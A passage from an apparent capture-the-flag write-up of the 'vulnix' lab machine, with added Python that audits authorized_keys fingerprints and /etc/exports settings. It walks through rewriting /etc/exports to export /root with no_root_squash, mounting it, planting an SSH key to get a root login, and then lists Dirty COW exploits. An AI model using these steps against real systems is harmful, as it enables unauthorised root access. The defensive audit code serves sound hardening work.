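def _ssh_string(b):
    """SSH wire-format string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def _mpint(n):
    """SSH wire-format mpint; the spare length byte keeps the top bit clear."""
    return _ssh_string(n.to_bytes((n.bit_length() + 8) // 8, "big"))


def demo_rsa_key(e, n, comment):
    """Build a syntactically valid ssh-rsa public-key line from constructed,
    cryptographically meaningless numbers. Only for producing sample input."""
    blob = _ssh_string(b"ssh-rsa") + _mpint(e) + _mpint(n)
    return f"ssh-rsa {base64.b64encode(blob).decode()} {comment}"


def fingerprint(b64_blob):
    """SHA256 fingerprint in the form ssh-keygen -lf prints and newer sshd
    versions log ("Accepted publickey ... RSA SHA256:...")."""
    try:
        raw = base64.b64decode(b64_blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError
        return "INVALID-BASE64"
    digest = hashlib.sha256(raw).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """Yield (key_type, fingerprint, comment) per key line. Blank and comment
    lines are skipped; a leading options field (from="...",no-pty) is
    tolerated by locating the key-type token."""
    for line in text.splitlines():
        parts = line.strip().split()
        if not parts or parts[0].startswith("#"):
            continue
        for i, tok in enumerate(parts):
            if tok in KEY_TYPES and i + 1 < len(parts):
                yield tok, fingerprint(parts[i + 1]), " ".join(parts[i + 2:])
                break


def audit_authorized_keys(text, approved_fingerprints):
    """Return the entries whose fingerprint is not on the allow-list."""
    return [entry for entry in parse_authorized_keys(text)
            if entry[1] not in approved_fingerprints]


# Constructed sample: the owner's expected key plus a planted one carrying a
# from= restriction and the tell-tale root@kali comment.
EXPECTED_KEY = demo_rsa_key(65537, 0xC0FFEE1234567890ABCDEF, "vulnix@vulnix")
PLANTED_KEY = demo_rsa_key(65537, 0xDEADBEEF0123456789ABCDEF, "root@kali")
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# keys for vulnix",
    EXPECTED_KEY,
    'from="192.168.44.1" ' + PLANTED_KEY,
    "",
])
APPROVED = {fingerprint(EXPECTED_KEY.split()[1])}

if __name__ == "__main__":
    for key_type, fp, comment in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, APPROVED):
        print(f"unexpected {key_type} key {fp} ({comment})")
```

Run over every home directory that appears in `/etc/exports`, this turns the attacker's trick into an alert; the fingerprint output also lets the finding be matched against the sshd log entry for the login that used the key. Pointing sshd at a root-owned `AuthorizedKeysFile` outside the exported home (for example under /etc/ssh) removes the write path altogether.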

0x03 Privilege Escalation

vulnix@vulnix:~$ sudo -ll
Matching 'Defaults' entries for vulnix on this host:
    env_reset,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User vulnix may run the following commands on this host:

Sudoers entry:
    RunAsUsers: root
    Commands:
        sudoedit /etc/exports
    RunAsUsers: root
    Commands:
        NOPASSWD: sudoedit /etc/export

From sudo -ll we learn that the export file can be edited with sudoedit without a password. Note that the two entries differ by one letter: the NOPASSWD entry is for /etc/export, while /etc/exports, the file actually edited below, is the entry without NOPASSWD.

vulnix@vulnix:~$ sudoedit /etc/exports

The original file only contained /home/vulnix; simply add root as another exported directory:

# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix    *(rw,no_root_squash)
/root           *(rw,no_root_squash)
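Both the root_squash discussion earlier and the exports file just shown come down to the same handful of settings: a wildcard client list, `no_root_squash`, and exporting home directories at all (with root_squash, a client that merely matches the owner's UID still gets full access, which is exactly how the vulnix account was taken over). The parser and audit below are an added example, not part of the original write-up; the sample is the target's exports file from above plus two constructed lines for contrast, and the finding codes are my own naming.

```python
# Added example (not from the original write-up): audit /etc/exports for the
# conditions this machine was compromised through. Sample content: the
# target's exports file shown above plus two constructed lines.
import re

SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
/home/vulnix    *(rw,no_root_squash)
/root           *(rw,no_root_squash)
/srv/share      10.0.0.0/24(ro,sync,root_squash,no_subtree_check)
/srv/public     *
"""

# A client spec is "<host>" or "<host>(opt,opt,...)"; host may be a name,
# an address, a subnet, or "*".
CLIENT_RE = re.compile(r"^(?P<host>[^(\s]*)(?:\((?P<opts>[^)]*)\))?$")


def parse_exports(text):
    """Return (path, client, options) triples. Options the file leaves unset
    are filled with the exportfs defaults that matter here: ro and
    root_squash. An empty host before the parentheses ("/pub (ro)") is
    treated as every host, which is how exportfs applies it."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for spec in clients:
            m = CLIENT_RE.match(spec)
            if not m:
                continue  # malformed client spec; exportfs would reject it too
            host = m["host"] or "*"
            opts = {o for o in (m["opts"] or "").split(",") if o}
            if "rw" not in opts:
                opts.add("ro")
            if "no_root_squash" not in opts and "all_squash" not in opts:
                opts.add("root_squash")
            entries.append((path, host, opts))
    return entries


def audit_exports(text):
    """Return (path, host, code, message) findings for risky exports."""
    findings = []
    for path, host, opts in parse_exports(text):
        if host == "*":
            findings.append((path, host, "wildcard-client",
                             "exported to every client; restrict to named hosts or subnets"))
        if "no_root_squash" in opts:
            findings.append((path, host, "no_root_squash",
                             "remote root keeps root on this export; use root_squash or all_squash"))
        if path in ("/root", "/home") or path.startswith("/home/"):
            findings.append((path, host, "home-export",
                             "home directory export: a client matching the owner's UID can write "
                             ".ssh/authorized_keys, and root_squash alone does not prevent that"))
        if "rw" in opts and host == "*":
            findings.append((path, host, "writable-wildcard", "writable by every client"))
    return findings


if __name__ == "__main__":
    for path, host, code, message in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} -> {host} [{code}]: {message}")
```

The `/srv/share` line produces no finding because it is read-only, squashes root and is limited to one subnet; that is the shape an export should have. Where UID-based trust is not acceptable at all, Kerberos-authenticated NFS (`sec=krb5` and stronger) ties access to principals instead of numeric IDs.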

After rebooting the target and listing the exports again, root is now shared:

┌──(kali㉿kali)-[~]
└─$ showmount -e 192.168.44.230                           
Export list for 192.168.44.230:
/root        *
/home/vulnix *

So create a directory and mount root on it:

┌──(kali㉿kali)-[~]
└─$ sudo mkdir /mnt/vulnroot                              

┌──(kali㉿kali)-[~]
└─$ sudo mount -t nfs 192.168.44.230:/root /mnt/vulnroot

Once it is mounted we can repeat the trick and generate an SSH key pair:

┌──(kali㉿kali)-[~/.ssh]
└─$ ssh-keygen -t ssh-rsa
Generating public/private ssh-rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): root_key
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in root_key
Your public key has been saved in root_key.pub
The key fingerprint is:
SHA256:WYQn4+8RkXF9595AiJu2c/0oRvda8tA+YrSnxvHKZAo kali@kali
The key's randomart image is:
+---[RSA 3072]----+
|         .o+.o   |
|        +.=.. o o|
|       . +.+ . o.|
|        .o=   . .|
|        So o . o.|
|          = ooo.o|
|         E =o+*+o|
|          o B*.Xo|
|           oo=*.+|
+----[SHA256]-----+

Create the .ssh folder, put the public key in it and name it authorized_keys:

┌──(kali㉿kali)-[~]
└─$ sudo mkdir /mnt/vulnroot/.ssh

┌──(kali㉿kali)-[~]
└─$ sudo cp .ssh/root_key.pub /mnt/vulnroot/.ssh/authorized_keys

Now we can log in to the root account without a password, and privilege escalation is complete.

┌──(kali㉿kali)-[~]
└─$ cd .ssh

┌──(kali㉿kali)-[~/.ssh]
└─$ ls -al
total 32
drwx------  2 kali kali 4096 Nov 20 05:40 .
drwxr-xr-x 22 kali kali 4096 Nov 20 05:59 ..
-rw-------  1 kali kali 2590 Nov 20 03:13 id_rsa
-rw-r--r--  1 kali kali  222 Nov 19 20:33 known_hosts
-rw-------  1 kali kali 2590 Nov 20 05:40 root_key
-rw-r--r--  1 kali kali  563 Nov 20 05:40 root_key.pub
-rw-------  1 kali kali 2590 Nov 20 04:55 y
-rw-r--r--  1 kali kali  563 Nov 20 04:55 y.pub

┌──(kali㉿kali)-[~/.ssh]
└─$ sudo ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i root_key root@192.168.44.230
[sudo] password for kali: 
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sun Nov 20 11:02:05 GMT 2022

  System load:  0.02             Processes:           93
  Usage of /:   90.2% of 773MB   Users logged in:     0
  Memory usage: 7%               IP address for eth0: 192.168.44.230
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife

New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sun Nov 20 10:43:21 2022 from 192.168.44.129
root@vulnix:~# ls -al
total 32
drwx------  4 root root 4096 Nov 20 10:36 .
drwxr-xr-x 22 root root 4096 Sep  2  2012 ..
-rw-------  1 root root    0 Sep  2  2012 .bash_history
-rw-r--r--  1 root root 3106 Apr 19  2012 .bashrc
drwx------  2 root root 4096 Sep  2  2012 .cache
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
drwxr-xr-x  2 root root 4096 Nov 20 10:42 .ssh
-r--------  1 root root   33 Sep  2  2012 trophy.txt
-rw-------  1 root root  710 Sep  2  2012 .viminfo
root@vulnix:~# cat trophy.txt 
cc614640424f5bd60ce5d5264899c3be

0x03' Privilege Escalation (2)

There is a vulnerability called Dirty COW that should also be usable:

└─$ searchsploit 3.9
-------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                        |  Path
-------------------------------------------------------------------------------------- ---------------------------------
...(many more)
Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service             | linux/dos/19818.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privi | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escal | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access  | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Es | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access M | linux/local/40611.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation         | linux/local/45010.c
Linux modutils 2.3.9 - 'modprobe' Arbitrary Command Execution                         | linux/local/20402.sh
...(many more)
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results


